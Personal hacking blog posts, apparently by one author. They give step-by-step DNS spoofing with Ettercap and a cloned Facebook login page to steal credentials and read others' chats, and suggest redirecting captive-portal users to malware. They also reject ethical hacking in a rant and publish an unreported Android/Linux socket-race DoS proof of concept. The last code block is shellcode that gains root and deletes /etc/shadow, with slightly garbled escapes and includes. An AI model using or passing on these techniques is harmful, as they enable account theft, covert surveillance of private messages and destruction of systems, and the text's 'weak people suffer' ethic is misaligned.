The magic of the DNS spoofing

After read the post related to intercept Facebook’s chats, I talked with a friend about other more “interesting” things that you can do with this simple attack.

Some months ago at Mexico were reveled attacks to press supposed by the government, using SMS to infect cellphones.. well, I think a SMS is not necessary, just perform a DNS attack to a captive portal in a Starbucks, a hotel, a company.. and redirect with a simple button the user to the malware…

Doubts?… 🙂

Well… you can also apply a DNS spoofing to *.videosXXXparahackearte.com just to create karma 😛

Reading chats

Well.. sometimes.. it’s needed to know what are writing others about you. Why?.. hum.. well, it’s a good question, and I have a great answer.. ok, no.. but yesterday I needed… so….

The most easy way is performing a DNS poisoning, using Ettercap. Open the the ettercap.dns, and modify the different domains you want to catch using the attack, for example.. facebook.com, *.facebook.com, *.gmail.com, gmail.com, web.whatsapp.com, etc…

So, after that you have two options; sniff the traffic using wireshark.. but you need to know that you will need to attack the SSL certificates in order to read the chats, or… open SET, and select the web vectors, clon the targets and point them to your computer, for example, clone https://www.facebook.com.

Now, using Ettercap select the targets you want to attack, select in the plug-ins “DNS poison”, and start sniffing. When the user requests a website that you included in the .dns file, he/she will be redirected to your computer and pwned!… you can catch the passwords, the chats, the requests, and it will be “transparent” because actually the DNS is answering with your IP to the victim.

Don’t judge me…

The new hackers… “ethical” hackers

[…] it focuses on how to become an ethical hacker. Mastering the art of hacking can be an extremely powerful skill that we hope will be used for good. The most successful hackers know how to navigate the thin line between right and wrong while hacking. Many people can break things, and even try to make a quick buck doing so. But imagine you can make the Internet safer, work with amazing companies around the world, and even get paid along the way. Your talent has the potential of keeping billions of people and their data secure. That is what we hope you aspire to.[…] – Pete Yaworski

 

Where went on the real hackers?… ethical hackers?… fuck Pete… have you sniffed the network at your school?, changed your notes?, stolen passwords?… good people always lose… hackers need to be unethical… fuck off with the world. If you can do something, do it.. weak people suffer, and it is ok.

I hate “ethical” hackers.

How to lose your Facebook account in some steps

Some months ago I lost my Facebook account, it was hacked by… yep.. by Karen. But, how the incredible, invencible, fabulous vendetta could be hacked?…

Well it was easy… actually very easy…

I was happy seeing a lot of extreme porn on the Internet when Karen asked me for help, so I connected to a VPN, yeap.. my fault, we were at the same IP range.

She used Ettercap to perform a DNS spoofing to www.facebook.com, pointing to her computer, and in her computer she configured a fake landing page using The Social Engineering Toolkit. I usually need to be connected to different VPN’s to work, so it’s normal to me be disconnected from my accounts. I entered to the Facebook’s messenger, entered my credentials and… pwned!

u.u

And that’s all… you don’t fall me very well que we say!

Ping DoS on Linux (Android)

Yep… it sounds weird, maybe it sounds stupid coff.. coff.. and I know, it’s sooooo unuseful… but… well the story is this:

On saturday I went with a friend to hum… well not to walk because I live in a hell’s extension.. around 40º C so is not possible to walk but to go to some places and I tried to explain her what is the difference between hacking (pentesting, attacks to Facebook, Whatsapp interception, etc) and real hacking (mostly vuln-dev)… she started to laugh when I compared the hacking with art… and I told that yes, sometimes as you can start to write, to paint or do whatever you want to do to feel better, you can start to look for bugs… and it’s relaxing and amusing… so I showed her how to find a bug on hers phone.. and here is the result.

I’m not very sure if it is reported to Android or to the Kernel Linux project.. but I don’t want to have any thing to see with Google or with Linus Torvals… so I prefer just publish here the bug.. and in the other hand I a bad guy… so I don’t report bugs anymore.

Oh yeap… she was not convinced about hacking is like art and she told me that I’m friki because I like this kind of estrange things D: … I’m not a friki D:

 


#include
#include <sys/socket.h>
#include <arpa/inet.h>
#include
static int sockfd = 0;
static struct sockaddr_in addr = {0};

void fuzz(void * param){
while(1){
addr.sin_family = 0;
printf("sin_family1 = %08lx\n", addr.sin_family);
connect(sockfd, (struct sockaddr *)&addr, 16);
}
}
int main(int argc, char **argv)
{
sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
int thrd;
pthread_create(&thrd, NULL, fuzz, NULL);
while(1){
addr.sin_family = 0x1a;
addr.sin_port = 0;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
connect(sockfd, (struct sockaddr *)&addr, 16);
addr.sin_family = 0;
}
return 0;
}

Without /etc/shadow


char tlayula[] =
"x31xc0"
"xb0x46"
"x31xdb"
"x31xc9"
"xcdx80"
"x31xc0"
"x50"
"x68x2fx2fx72x6d"
"x68x2fx62x69x6e"
"x89xe3"
"x50"
"x68x61x64x6fx77"
"x68x2fx2fx73x68"
"x68x2fx65x74x63"
"x89xe1"
"x50"
"x51"
"x53"
"x89xe1"
"xb0x0b"
"xcdx80";
main()
{
(*(void(*) ()) tlayula)();
}

The life is cruel… and I’m worst B\